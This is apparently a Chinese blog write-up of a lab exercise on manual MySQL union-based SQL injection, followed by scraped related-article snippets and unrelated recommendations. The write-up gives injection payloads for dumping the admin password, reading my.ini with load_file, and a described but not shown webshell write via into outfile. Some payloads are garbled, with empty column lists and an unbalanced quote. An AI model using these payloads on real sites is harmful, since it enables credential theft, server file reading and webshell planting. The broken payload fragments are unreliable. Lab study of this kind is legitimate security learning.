这是今天的任务
任务三个 : 第一个手工注入找出admin用户的密码,第二个读取我phpstudy中mysql的my.ini这个配置文件的内容,第三个是通过这个注入点写入一个webshell,  都是要求手工,具体方法自己百度mysql5注入相关内容
 union select ,,,,

查询语句 第一步是先构造闭合 加入单引号报错 然后 更据and 1=1 and1=2看是字符型还是布尔型注入

http://www.萨达所大大所多t/index.php?id=1%20order%20by%205

数据库test

查询所有数据库

网址+union select 1,2,3,4,schema_name from information_schema.schemata

要求是读取web端口的admin密码 那我们应该进入test数据库

爆表名

网站+union select ,,,,table_name from information_schema.tables where table_schema='test'

这里原来的语句已经闭合 不需要你去闭合了

看见有admin表之后继续爆列名

union select ,,,,column_name from information_schema.columns where table_name='admin'

看见有username 和password应该就是我们要爆破的字段名 来爆破吧

网站+union select username,password,,, from admin

这个应该就是我们要爆破的数据 admin admin888

0X02读取靶机phpstudy里面mysql的my.ini这个文件

那有注入点 我们看看是否有读写文件的权限呐? 因为这里的user()是root那我们就有读取文件的权限了

1、必须有权限读取并且文件必须完全可读。

and (select count(*) from mysql.user)>0 /*如果结果返回正常,说明具有读写权限.*/

and (select count(*) from mysql.user)>0 /* 返回错误,应该是管理员给数据库账户降权了*/

2、欲读取文件必须在服务器上

3、必须指定文件完整的路径

4、欲读取文件必须小于max_allowed_packet

  如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。比较难满足的就是权限。

在windows下,如果NTFS设置得当,是不能读取相关的文件的,当遇到administrators才能访问的文件,

users就不能实现用load_file读取文件了。

利用需要满足以下条件:

  1. 1.     root权限
  2. 2.     GPC关闭(能使用单引号)
  3. 3.     有绝对路径(读文件可以不用,写文件必须)
  4. 4.     没有配置—secure-file-priv

那么权限够了 路径怎么办呐??????

两个函数的介绍

@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

union select user(),,,@@datadir,@@basedir

好像找到路径了E:\phpstudy\MySQL\data\ 那我们看看mysql的my.ini文件一般在哪个文件夹下面 去百度一下

这里分享这个

https://blog.csdn.net/jiangyu1013/article/details/79792708

那更据他的理解路径应该是 E:\phpstudy\MySQL\data\my.ini

那我们就具备读文件的权限了

构造语句 这里第一次构造的路径是\一个斜杠的 不知道为什么不行 网上说两个斜杠就好 我就去试了一下

网址+%20union%20select%20load_file(%27E:\\phpstudy\\MySQL\\my.ini%),,,,

成功读取文件

0X03写入自己的webshell

那么这个要满足的条件就更多了

没有配置—secure-file-priv 这个是什么东西呐?看看下面这个博客

https://blog.csdn.net/qq_41173457/article/details/81264564

好咯 回归正题

尝试一下嘛先 管他配没配置 但是一般这个网页的路径在哪里呐?

我们只是知道mysql的路径的啊 提示告诉我们是phpstudy 我们看看自己的phpstudy mysql和WWW同目录

那我们来尝试一下吧

我的天 过滤了  那我们尝试一下16进制直接写入吧

而且好像还把目录报错出来了

我们的目录写错了应该是E:\phpstudy\WWW\sqli-one\

但是还是会报错

https://blog.csdn.net/qianduan520/article/details/52383214

这篇文章给大家解释的很清楚了

跟着改就行

然后就会成功

致谢--- 卿哥

加油努力!!!

大哥带我们的mysql注入的更多相关文章

  1. 大哥带我们的mysql注入 基于时间的盲注

    ?id= and ,,sleep()) ?id= and ,,sleep()) if语句/if()函数 在基于时间型SQL盲注中,我们经常使用条件语句来判断我们的操作是否正确: ?id= and = ...

  2. 大哥带我们的mysql注入 基于bool的盲注

    盲注 那么我们来了解一点盲注的语法 这里面是语法的介绍 https://blog.csdn.net/alex_seo/article/details/82148955 0X01第一步我们先判断当前数据 ...

  3. [转载] MySQL 注入攻击与防御

    MySQL 注入攻击与防御 2017-04-21 16:19:3454921次阅读0     作者:rootclay 预估稿费:500RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页 ...

  4. 对MYSQL注入相关内容及部分Trick的归类小结

    前言 最近在给学校的社团成员进行web安全方面的培训,由于在mysql注入这一块知识点挺杂的,入门容易,精通较难,网上相对比较全的资料也比较少,大多都是一个比较散的知识点,所以我打算将我在学习过程中遇 ...

  5. Mysql注入汇总!!!!!!!!!

    师傅tpl!!!!! https://xz.aliyun.com/t/7169[对MYSQL注入相关内容及部分Trick的归类小结] https://www.jianshu.com/p/f261125 ...

  6. 十三:SQL注入之MYSQL注入

    MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作,其中也会遇到很多的阻碍,相关防御手法也要明确,所谓知己知彼,百战不殆.作为安全开发工作者,攻 ...

  7. Zabbix-agent使用自带模板监控 MySQL

    1.rpm -ivh http://repo.zabbix.com/zabbix/2.4/rhel/6/x86_64/zabbix-release-2.4-1.el6.noarch.rpm 2.yum ...

  8. MySQL注入与防御(排版清晰内容有条理)

    为何我要在题目中明确排版清晰以及内容有条理呢? 因为我在搜相关SQL注入的随笔博客的时候,看到好多好多都是页面超级混乱的.亲爱的园友们,日后不管写博客文章还是平时写的各类文章也要多个心眼,好好注意一下 ...

  9. Mysql注入小tips --持续更新中

    学习Web安全好几年了,接触最多的是Sql注入,一直最不熟悉的也是Sql注入.OWASP中,Sql注入危害绝对是Top1.花了一点时间研究了下Mysql类型的注入. 文章中的tips将会持续更新,先说 ...

随机推荐

  1. 洛谷 P1809 过河问题 题解

    题面 这道题是一道贪心+DP的好题: 首先排序是一定要干的事情. 然后我们分情况处理: 1.如果剩一个人,让最小的回来接他 2.如果剩两个人,让最小的回来接,剩下的那两个人(即最大的两个人)过去,让次 ...

  2. c++ vector 使用注意事项

    1. 初始化 c++ 11以后新增了大括号{}的初始化方式,需要注意与()的区别,如: std::vector<int> vecTest1(5);         //初始化5个元素,每个 ...

  3. 解决PHP上传文件、下载文件中由于文件过大导致的上传失败及下载不全问题

    用php+apache上传文件的时候,由于文件过大,容易导致上传失败, 解决办法:修改php.ini中:upload_max_filesize  2m  即允许上传文件大小的最大值.默认为2M ,大小 ...

  4. 8.jQuery之上下滑动效果

    上下滑动:slideDown   slideUp  slideToggle <style> div { width: 150px; height: 300px; background-co ...

  5. scrapy在settings中添加redis,可以实现断点续传

    DUPEFILTER_CLASS='scrapy_redis.dupefilter.RFPDupeFilter'SCHEDULER = 'scrapy_redis.scheduler.Schedule ...

  6. linux复习3:linux字符界面的操作

    一.前言 1.对linux服务器进行管理的时候,经常要进入字符界面进行操作,使用命令需要记住该命令的相关选项和参数.vi编辑器可以用于编辑任何ASCII文本,功能非常的强大,可以对文本进行创建.查找. ...

  7. java复习(2)

    1.函数的重载:在同一个类中,允许存在一个以上的同名函数,只要他们的参数个数或者参数类型不相同就可以. 重载与返回值类型无关,只看参数列表.重载方便阅读,优化了程序的设计 eg://返回两个 整数值的 ...

  8. Windows向Linux上传文件夹

      1.将文件夹压缩成.tar.gz文件: 安装7-Zip,选择要压缩的文件夹--右键--“7-Zip”--“添加到压缩包...”,压缩格式选择“tar”, 在此目下就生成了“文件夹名.tar”文件, ...

  9. vue学习【四】vuex快速入门

    大家好,我是一叶,今天我们继续踩坑.今天的内容是vuex快速入门,页面传值不多的话,不建议vuex,直接props进行父子间传值就行,使用vuex就显得比较臃肿. 我们先预览一下效果,如图1所示. 图 ...

  10. NoSQL与其常见的产品

    一. 什么是NoSQL NoSQL(NoSQL = Not Only SQL ),意即"不仅仅是SQL",它是一种非关系型数据库. 二. 为什么要有NoSQL 在现代的计算系统上每 ...